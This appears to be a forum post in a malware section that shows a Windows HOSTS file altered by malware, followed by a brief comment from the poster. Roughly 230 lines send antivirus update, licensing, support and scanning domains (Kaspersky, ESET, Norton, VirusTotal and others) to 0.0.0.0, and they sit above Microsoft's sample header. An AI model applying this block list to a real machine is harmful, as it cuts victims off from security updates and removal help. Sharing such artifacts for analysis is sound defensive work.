0.0.0.0 www.reasoncoresecurity.com
0.0.0.0 reasoncoresecurity.com
0.0.0.0 drweb.com
0.0.0.0 ec.sunbeltsoftware.com
0.0.0.0 emupdate.avast.com
0.0.0.0 esetnod32.ru
0.0.0.0 zillya.ua
0.0.0.0 www.zillya.ua
0.0.0.0 expire.eset.com
0.0.0.0 gms.ahnlab.com
0.0.0.0 go.eset.eu
0.0.0.0 i1.c.eset.com
0.0.0.0 i2.c.eset.com
0.0.0.0 i3.c.eset.com
0.0.0.0 i4.c.eset.com
0.0.0.0 iploc.eset.com
0.0.0.0 ipm.avira.com
0.0.0.0 ipm.bitdefender.com
0.0.0.0 ksn4-12.kaspersky-labs.com
0.0.0.0 ksn-file-geo.kaspersky-labs.com
0.0.0.0 ksn-info-geo.kaspersky-labs.com
0.0.0.0 ksn-ipm-1.kaspersky-labs.com
0.0.0.0 ksn-kas-geo.kaspersky-labs.com
0.0.0.0 ksn-kddi.kaspersky-labs.com
0.0.0.0 ksn-pbs-geo.kaspersky-labs.com
0.0.0.0 ksn-stat-geo.kaspersky-labs.com
0.0.0.0 ksn-tboot-1.kaspersky-labs.com
0.0.0.0 ksn-tcert-geo.kaspersky-labs.com
0.0.0.0 ksn-tpcert-1.kaspersky-labs.com
0.0.0.0 ksn-url-geo.kaspersky-labs.com
0.0.0.0 ksn-verdict-geo.kaspersky-labs.com
0.0.0.0 licenseactivation.security.comodo.com
0.0.0.0 license.avira.com
0.0.0.0 license.nanoav.ru
0.0.0.0 license.trustport.com
0.0.0.0 licensing.security.comodo.com
0.0.0.0 login.bullguard.com
0.0.0.0 login.norton.com
0.0.0.0 metrics.bitdefender.com
0.0.0.0 mirror01.gdata.de
0.0.0.0 my.bitdefender.com
0.0.0.0 newton.norman.com
0.0.0.0 nimbus.bitdefender.net
0.0.0.0 niufour.norman.no
0.0.0.0 niuone.norman.no
0.0.0.0 niuseven.norman.no
0.0.0.0 o2.norton.com
0.0.0.0 omni.avg.com
0.0.0.0 oms.symantec.com
0.0.0.0 p003.sb.avast.com
0.0.0.0 p.filseclab.com
0.0.0.0 www.filseclab.com
0.0.0.0 ping.avast.com
0.0.0.0 premium.avira-update.com
0.0.0.0 program.avast.com
0.0.0.0 proxy.eset.com
0.0.0.0 redirect.avira.com
0.0.0.0 reg03.eset.com
0.0.0.0 register.k7computing.com
0.0.0.0 resolver1.bullguard.ctmail.com
0.0.0.0 resolver2.bullguard.ctmail.com
0.0.0.0 resolver3.bullguard.ctmail.com
0.0.0.0 resolver4.bullguard.ctmail.com
0.0.0.0 resolver5.bullguard.ctmail.com
0.0.0.0 rol.pandasecurity.com
0.0.0.0 360totalsecurity.com
0.0.0.0 www.360totalsecurity.com
0.0.0.0 secure.comodo.net
0.0.0.0 shasta-rrs.symantec.com
0.0.0.0 shop.esetnod32.ru
0.0.0.0 slcw.ff.avast.com
0.0.0.0 spoc-pool-gtm.norton.com
0.0.0.0 s.program.avast.com
0.0.0.0 static2.avast.com
0.0.0.0 static.avg.com
0.0.0.0 stats.norton.com
0.0.0.0 stats.qalabs.symantec.com
0.0.0.0 store.lavasoft.com
0.0.0.0 su.ff.avast.com
0.0.0.0 support.norton.com
0.0.0.0 symantec.tt.omtrdc.net
0.0.0.0 threatnet.threattrack.com
0.0.0.0 trace.eset.com
0.0.0.0 tracking.lavasoft.com
0.0.0.0 ts-crl.ws.symantec.com
0.0.0.0 ts.eset.com
0.0.0.0 uc.cloud.avg.com
0.0.0.0 um01.eset.com
0.0.0.0 um21.eset.com
0.0.0.0 update2.bullguard.com
0.0.0.0 update.avg.com
0.0.0.0 update.bullguard.com
0.0.0.0 update.eset.com
0.0.0.0 updates.agnitum.com
0.0.0.0 updates.k7computing.com
0.0.0.0 updates.sunbeltsoftware.com
0.0.0.0 upgrade.bitdefender.com
0.0.0.0 upgr-mmxiii-p.cdn.bitdefender.net
0.0.0.0 upgr-mmxiv.cdn.bitdefender.net
0.0.0.0 v7.stats.avast.com
0.0.0.0 versioncheck.eset.com
0.0.0.0 vl.ff.avast.com
0.0.0.0 wam.pandasecurity.com
0.0.0.0 webprot.avgate.net
0.0.0.0 webprot.avira.com
0.0.0.0 webprot.avira.de
0.0.0.0 wsmy.pandasecurity.com
0.0.0.0 www5.avira.com
0.0.0.0 www.avira.com
0.0.0.0 download.sp.f-secure.com
0.0.0.0 www.bullguard.com
0.0.0.0 www.esetnod32.ru
0.0.0.0 www.k7-russia.ru
0.0.0.0 www.lavasoft.com
0.0.0.0 www.mks.com.pl
0.0.0.0 www.nanoav.ru
0.0.0.0 www.pandasecurity.com
0.0.0.0 www-secure.symantec.com
0.0.0.0 www.sunbeltsoftware.com
0.0.0.0 www.trustport.com
0.0.0.0 kaspersky.ru
0.0.0.0 www.kaspersky.ru
0.0.0.0 avast.ru
0.0.0.0 www.avast.ru
0.0.0.0 freeavg.com
0.0.0.0 www.freeavg.com
0.0.0.0 free.avg.com
0.0.0.0 www.free.avg.com
0.0.0.0 avira.com
0.0.0.0 z-oleg.com
0.0.0.0 www.z-oleg.com
0.0.0.0 bitdefender.com
0.0.0.0 www.bitdefender.com
0.0.0.0 bullguard.com
0.0.0.0 personalfirewall.comodo.com
0.0.0.0 www.personalfirewall.comodo.com
0.0.0.0 comodo.com
0.0.0.0 www.comodo.com
0.0.0.0 www.drweb.com
0.0.0.0 www.emsisoft.ru
0.0.0.0 emsisoft.ru
0.0.0.0 avescan.ru
0.0.0.0 www.avescan.ru
0.0.0.0 escanav.com
0.0.0.0 www.escanav.com
0.0.0.0 escan.com
0.0.0.0 www.escan.com
0.0.0.0 f-prot.com
0.0.0.0 www.f-prot.com
0.0.0.0 f-secure.com
0.0.0.0 www.f-secure.com
0.0.0.0 gdatasoftware.com
0.0.0.0 ru.gdatasoftware.com
0.0.0.0 www.gdata.de
0.0.0.0 gdata.de
0.0.0.0 ikarussecurity.com
0.0.0.0 www.ikarussecurity.com
0.0.0.0 malwarebytes.org
0.0.0.0 www.malwarebytes.org
0.0.0.0 nanoav.ru
0.0.0.0 symantec.com
0.0.0.0 www.symantec.com
0.0.0.0 norton.com
0.0.0.0 www.norton.com
0.0.0.0 ru.norton.com
0.0.0.0 agnitum.ru
0.0.0.0 www.agnitum.ru
0.0.0.0 cloudantivirus.com
0.0.0.0 www.cloudantivirus.com
0.0.0.0 pandasecurity.com
0.0.0.0 www.rising.com.cn
0.0.0.0 rising.com.cn
0.0.0.0 rising-global.com
0.0.0.0 www.rising-global.com
0.0.0.0 www.rising-russia.com
0.0.0.0 rising-russia.com
0.0.0.0 freerav.com
0.0.0.0 www.freerav.com
0.0.0.0 safensoft.ru
0.0.0.0 www.safensoft.ru
0.0.0.0 trustport.com
0.0.0.0 www.trustport-ru.ru
0.0.0.0 virustotal.com
0.0.0.0 www.virustotal.com
0.0.0.0 zillya.com
0.0.0.0 www.zillya.com
0.0.0.0 anti-virus.by
0.0.0.0 www.anti-virus.by
0.0.0.0 sophos.com
0.0.0.0 www.sophos.com
0.0.0.0 www.freedrweb.com
0.0.0.0 freedrweb.com
0.0.0.0 www.avirus.ru
0.0.0.0 www.avg.com
0.0.0.0 avg.com
0.0.0.0 mcafee.com
0.0.0.0 www.mcafee.com
0.0.0.0 siteadvisor.com
0.0.0.0 www.siteadvisor.com
0.0.0.0 support.kaspersky.ru
0.0.0.0 www.comss.ru
0.0.0.0 comss.ru
0.0.0.0 www.spyware-ru.com
0.0.0.0 spyware-ru.com
0.0.0.0 virusinfo.info
0.0.0.0 www.virusinfo.info
0.0.0.0 forum.esetnod32.ru
0.0.0.0 www.forum.esetnod32.ru
0.0.0.0 forum.drweb.com
0.0.0.0 www.forum.drweb.com
0.0.0.0 forum.virlab.info
0.0.0.0 www.forum.virlab.info
0.0.0.0 spybot.info
0.0.0.0 www.spybot.info
0.0.0.0 winpatrol.com
0.0.0.0 www.quickheal.com
0.0.0.0 quickheal.com
0.0.0.0 www.winpatrol.com
0.0.0.0 av.download.avg.com
127.0.0.1 localhost
       # Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#	127.0.0.1       localhost
#	::1             localhost


127.0.0.1       localhost
Interesting to find DrWeb Security Space 9.0 installer in blacklist, AFAIK it is old and dated back to 2013. This malware is a mess of crap and additionally doubled.
Attachments
(114.54 KiB) Downloaded 68 times
 Return to “Malware”